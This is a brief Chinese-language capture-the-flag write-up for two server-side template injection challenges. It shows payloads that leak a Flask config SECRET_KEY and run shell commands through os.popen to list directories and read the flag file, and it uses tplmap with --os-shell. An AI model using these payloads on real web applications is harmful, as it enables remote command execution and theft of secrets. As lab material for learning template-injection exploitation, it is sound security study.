Simple_SSTI_1
?flag={{1*1}}
得到回显1,存在注入点
查看页面源代码,得到提示we often set a secret_key variable
flag是通过secret_key方法生成的加密字符串
?flag={{config.SECRET_KEY}}
得到flag
使用tplmap
python tplmap.py -u "url/?flag={{}}"
python tplmap.py -u "url/?flag={{}}" --os-shell
提权成功,可以查看文件
Simple_SSTI_2
查看源代码,什么都没有
但是/?flag={{1*1}}仍有回显
存在注入
/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
可以查看到目录
再查看app
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}
可以看到目录下存在flag文件
查看flag
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
tplmap
显示可以提权
提权后查看目录发现flag文件
cat flag
得到flag